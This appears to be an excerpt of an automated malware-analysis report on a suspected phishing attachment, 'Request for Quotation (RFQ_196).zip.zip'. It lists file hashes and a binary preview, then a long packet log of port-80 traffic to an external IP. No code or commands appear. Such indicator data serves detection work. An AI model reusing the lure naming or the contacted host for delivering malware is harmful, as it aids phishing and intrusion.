                                                          Entropy (8bit):7.999950924288556
                                                          TrID:
                                                          • ZIP compressed archive (8000/1) 99.91%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                          File name:Request for Quotation (RFQ_196).zip.zip
                                                          File size:3'482'858 bytes
                                                          MD5:2747028c2334ea64ada17b371c9eb469
                                                          SHA1:ba52213356b615f2fd08d69191b325d0abe7f8f6
                                                          SHA256:f905bfd1b61ce94eb6d9d5d69157583416b6fc79dd5e4507e98fee7f537b19a0
                                                          SHA512:91762e266301ec325f8db1722318a396389d5c28a27a96a942d7e48e9350473e9931d4c1b9a88448d2e1be631d1c149d95f295e4732cdd251389e9c63adf0fc9
                                                          SSDEEP:98304:4LmONDhOs46W0Nca3gpC62ZNMrla0Iy/F8mU:h+MJ9pHdIyt8T
                                                          TLSH:F9F53327D0562DA1E0FC6C4AAE38CBD4F9536117123F6B47869B1B21A603B478EFF119
                                                          File Content Preview:PK..3...c..K0X............#...Request for Quotation (RFQ_196).zip......AE...t,.2.]K<L..JW..Od'....W....K......%V.....I...+.B...W4m...>T....9)...+..c.yXv.R........@...1.............q..Oz.\...q5.(..I.@w.0y\...^Y.fg)... .>U..e..b...W.5........n.5..Z.?...mV..
                                                          Icon Hash:1c1c1e4e4ececedc
                                                          Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                          Jan 16, 2024 11:59:48.425781965 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425853014 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425903082 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425934076 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425946951 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425957918 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.425976038 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.425976038 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.426002026 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.426052094 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.426052094 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.427084923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.469156027 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.516190052 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.602001905 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602030993 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602050066 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602089882 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.602111101 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.602111101 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.602154016 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618581057 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618607998 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618621111 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618643999 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618648052 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618666887 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618701935 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618715048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618729115 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618751049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618751049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618771076 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618773937 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618777990 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618827105 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618838072 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618861914 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618906021 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618937969 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.618949890 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618949890 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.618967056 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619014978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619014978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619023085 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619036913 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619071007 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619082928 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619132042 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619134903 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619134903 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619144917 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619157076 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619179964 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619191885 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619198084 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619198084 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619251966 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619265079 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619277000 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619298935 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619299889 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619299889 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619317055 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619318962 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619347095 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619374037 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619374037 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619388103 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619394064 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619410038 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619421005 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619452000 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619473934 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619473934 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619481087 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619527102 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619527102 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619558096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619574070 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619585991 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619607925 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619649887 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619651079 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619654894 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619673967 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619685888 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619698048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619723082 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619725943 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619725943 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619765997 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619820118 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619834900 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619883060 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619883060 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619898081 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619919062 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619930983 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619945049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619945049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619972944 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.619973898 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.619973898 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620028019 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620076895 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620076895 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620080948 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620095968 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620117903 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620165110 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620165110 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620327950 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620342970 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620434046 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620502949 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620635986 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.620817900 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.620942116 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.621139050 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.621227026 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.621429920 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.621521950 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.621602058 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.621851921 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.622006893 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.622193098 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.622230053 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.622230053 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.622383118 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.622473001 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.622509956 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.622567892 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.622886896 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.622986078 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623028040 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623191118 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623213053 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623543024 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623550892 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623557091 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623558998 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623574972 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623586893 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623588085 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623588085 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623606920 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623620987 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623631001 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623641968 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623642921 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623641968 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623655081 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623666048 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623678923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623692036 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623704910 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.623713017 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.623744011 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.710803032 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.710876942 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.796029091 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796045065 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796056986 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796067953 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796078920 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796083927 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.796094894 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796113968 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796122074 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.796123028 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.796150923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.796150923 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.796170950 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812393904 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812410116 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812421083 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812438965 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812447071 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812455893 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812468052 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812478065 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812485933 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812485933 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812491894 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812504053 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812515974 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812519073 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812519073 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812526941 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812541008 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812545061 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812545061 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812563896 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812577963 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812628031 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812639952 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812647104 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812666893 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812666893 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812685013 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812685013 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812694073 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812697887 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812710047 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812737942 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812737942 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812756062 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812767029 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812781096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812791109 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812813997 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812813997 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812822104 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812854052 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812854052 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812860012 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812865019 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812930107 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812954903 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812961102 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:48.812973022 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:48.812994003 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.007468939 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.007538080 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.007675886 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.007675886 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008033991 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008073092 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008150101 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008161068 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008217096 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008275986 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008297920 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008299112 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008368969 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008393049 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008445024 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008467913 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008510113 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008533955 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008668900 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008707047 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008733988 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008759975 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008764029 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008892059 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008934975 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008948088 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008980989 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008980989 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.008986950 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.008996010 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.009011030 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.009041071 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.009057999 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.009105921 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.009107113 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.009144068 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.009150982 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.009166956 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.009171963 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.009222984 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.009222984 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.010423899 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010432005 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010443926 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010492086 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010581017 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010617971 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.010617971 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.010622025 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010632038 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010649920 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010695934 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.010700941 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010716915 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010791063 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.010941982 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010974884 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.010983944 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011018038 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.011018038 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.011229992 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011245966 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011290073 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.011358023 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011364937 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011406898 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011447906 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011488914 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011497021 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.011497021 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.011555910 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.011601925 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.011601925 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.012819052 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.012871027 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.012878895 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.012890100 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.012891054 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.012897015 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.012923956 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.012931108 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.012943029 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.012949944 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013066053 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013072968 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.013134003 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013140917 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013148069 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013180017 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013206005 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.013222933 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.013222933 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.013252974 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015301943 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015362978 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015366077 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015420914 CET4972980192.168.2.16171.25.193.9
                                                          Jan 16, 2024 11:59:49.015427113 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015434027 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015440941 CET8049729171.25.193.9192.168.2.16
                                                          Jan 16, 2024 11:59:49.015466928 CET8049729171.25.193.9192.168.2.16
